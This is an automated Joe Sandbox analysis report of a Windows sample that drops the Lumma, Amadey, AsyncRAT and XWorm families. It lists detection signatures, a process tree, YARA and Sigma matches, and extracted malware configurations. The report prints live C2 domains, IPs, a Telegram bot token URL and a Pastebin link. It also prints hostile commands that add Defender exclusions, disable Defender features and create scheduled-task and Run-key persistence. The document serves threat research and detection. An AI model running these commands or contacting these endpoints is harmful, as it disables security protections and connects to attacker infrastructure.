Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1579159
MD5:c9624e4e0c6bbc83b57f844d1dc44102
SHA1:b0f8c247986305f8f1f83ea55bb04f6c748557ce
SHA256:a7a661cf43d7129a809901c641998089aff10f97a09bbdf5874ba16c01db5dfb
Tags:exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, AsyncRAT, LummaC Stealer, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Amadeys stealer DLL
Yara detected AntiVM3
Yara detected AsyncRAT
Yara detected LummaC Stealer
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Drops PE files with a suspicious file extension
Drops large PE files
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides threads from debuggers
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 6096 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C9624E4E0C6BBC83B57F844D1DC44102)
    • skotes.exe (PID: 6200 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: C9624E4E0C6BBC83B57F844D1DC44102)
  • skotes.exe (PID: 1592 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: C9624E4E0C6BBC83B57F844D1DC44102)
    • 2gwmtZs.exe (PID: 5208 cmdline: "C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe" MD5: F16E098C7EFAD8AB0B6E62C428E7E649)
      • WerFault.exe (PID: 4952 cmdline: C:\Windows\system32\WerFault.exe -u -p 5208 -s 784 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • RzAAR0y.exe (PID: 6860 cmdline: "C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe" MD5: A732362B415CD62F07D30DB89E742C85)
    • 28d287a54d.exe (PID: 7020 cmdline: "C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA)
      • cmd.exe (PID: 3792 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mode.com (PID: 6556 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)
        • 7z.exe (PID: 3160 cmdline: 7z.exe e file.zip -p24291711423417250691697322505 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 1464 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 7144 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 4512 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 5724 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 6528 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 2396 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 3208 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • attrib.exe (PID: 5960 cmdline: attrib +H "in.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • in.exe (PID: 1540 cmdline: "in.exe" MD5: 83D75087C9BF6E4F07C36E550731CCDE)
          • attrib.exe (PID: 6696 cmdline: attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 4600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • attrib.exe (PID: 3048 cmdline: attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 6964 cmdline: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 4208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6088 cmdline: powershell ping 127.0.0.1; del in.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 4396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • PING.EXE (PID: 6808 cmdline: "C:\Windows\system32\PING.EXE" 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
    • vQeyqr1.exe (PID: 6500 cmdline: "C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe" MD5: 07E410214A2AEB8F577E407154252F3C)
      • powershell.exe (PID: 2644 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'vQeyqr1.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 0064eff6c8.exe (PID: 2324 cmdline: "C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe" MD5: 8EB4F92605E35C57A42B0917C221D65C)
      • cmd.exe (PID: 528 cmdline: "C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 6748 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 6556 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
    • 22b0b7688f.exe (PID: 5232 cmdline: "C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe" MD5: 0121D24D5F6392439A1D49C2904595E1)
    • 950932ab59.exe (PID: 424 cmdline: "C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe" MD5: 27C1F96D7E1B72B6817B6EFEFF037F90)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
{"C2 url": ["sustainskelet.lat", "sweepyribs.lat", "crosshuaht.lat", "aspecteirs.lat", "discokeyus.lat", "necklacebudi.lat", "energyaffai.lat", "rapeflowwj.lat", "grannyejh.lat"], "Build id": "PvbArZ--"}
{"C2 url": ["45.200.149.15"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
{"C2 url": "https://api.telegram.org/bot8174428401:AAHxlGtOg4tsy0J0kYm7h8822BuHfnk8vKQ/sendMessage"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
{"Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.3", "Mutex": "hgzuiajogwnqs", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "Server Signature": "kFccRRCzW3jG/otfy1Jkj43o0+4OxnCs1oCpmxYTk3m7JpGlsS6RGQjGzdX6D5uOIuCbvZ6LcErP2gcbdu30OOKRo2h1VjJW/J05YD4xFgwBHdMxA1DXT6Q4kwhO3cK5KTA9hcSqIF+Z0LOI9nl3fyGZmlcmxLX5iHGRq64bny8=", "External_config_on_Pastebin": "https://pastebin.com/raw/dDuwSpUA"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
    C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x10a57:$s6: VirtualBox
          • 0x109b5:$s8: Win32_ComputerSystem
          • 0x138d0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x1396d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x13a82:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x11feb:$cnc4: POST / HTTP/1.1
          Click to see the 10 entries
          SourceRuleDescriptionAuthorStrings
          0000000B.00000002.4672951353.000001AC390B0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            0000000B.00000002.4672951353.000001AC390B0000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x6c78:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x6d15:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x6e2a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x6aea:$cnc4: POST / HTTP/1.1
            0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
              0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
              • 0xf8b4:$q1: Select * from Win32_CacheMemory
              • 0xf8f4:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
              • 0xf942:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
              • 0xf990:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
              0000000E.00000002.4646618680.0000000001470000.00000004.08000000.00040000.00000000.sdmpINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
              • 0x4811:$reg1: SOFTWARE\Microsoft\Windows Defender\Features
              • 0x4891:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x4916:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x6a9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x6b59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x6bd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x6da1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x4daf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutuser $true
              • 0x4e67:$s2: Set-MpPreference -DisableArchiveScanning $true
              • 0x4f07:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true
              • 0x4fa5:$s4: Set-MpPreference -DisableScriptScanning $true
              • 0x502f:$s5: Set-MpPreference -SubmitSamplesConsent 2
              • 0x509d:$s6: Set-MpPreference -MAPSReporting 0
              • 0x5115:$s7: Set-MpPreference -HighThreatDefaultAction 6
              • 0x51b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6
              • 0x5241:$s9: Set-MpPreference -LowThreatDefaultAction 6
              • 0x52cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6
              • 0x5422:$e2: Add-MpPreference -ExclusionPath
              Click to see the 24 entries
              SourceRuleDescriptionAuthorStrings
              11.2.RzAAR0y.exe.1ac390b0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                11.2.RzAAR0y.exe.1ac390b0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0x4e78:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x4f15:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x502a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0x4cea:$cnc4: POST / HTTP/1.1
                11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0x6c78:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0x6d15:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0x6e2a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0x6aea:$cnc4: POST / HTTP/1.1
                  14.2.vQeyqr1.exe.1e610000.2.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                    Click to see the 19 entries

                    System Summary

                    barindex
                    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1018907001\224de4e34e.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 1592, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\224de4e34e.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, ParentProcessId: 6500, ParentProcessName: vQeyqr1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', ProcessId: 2644, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, ParentProcessId: 6500, ParentProcessName: vQeyqr1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', ProcessId: 2644, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, ParentProcessId: 6500, ParentProcessName: vQeyqr1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', ProcessId: 2644, ProcessName: powershell.exe
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, ParentProcessId: 6500, ParentProcessName: vQeyqr1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', ProcessId: 2644, ProcessName: powershell.exe
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1018907001\224de4e34e.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 1592, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\224de4e34e.exe
                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, ProcessId: 6500, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wemyp0ph.j1f.ps1
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, ParentProcessId: 6500, ParentProcessName: vQeyqr1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', ProcessId: 2644, ProcessName: powershell.exe
                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, ProcessId: 6500, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
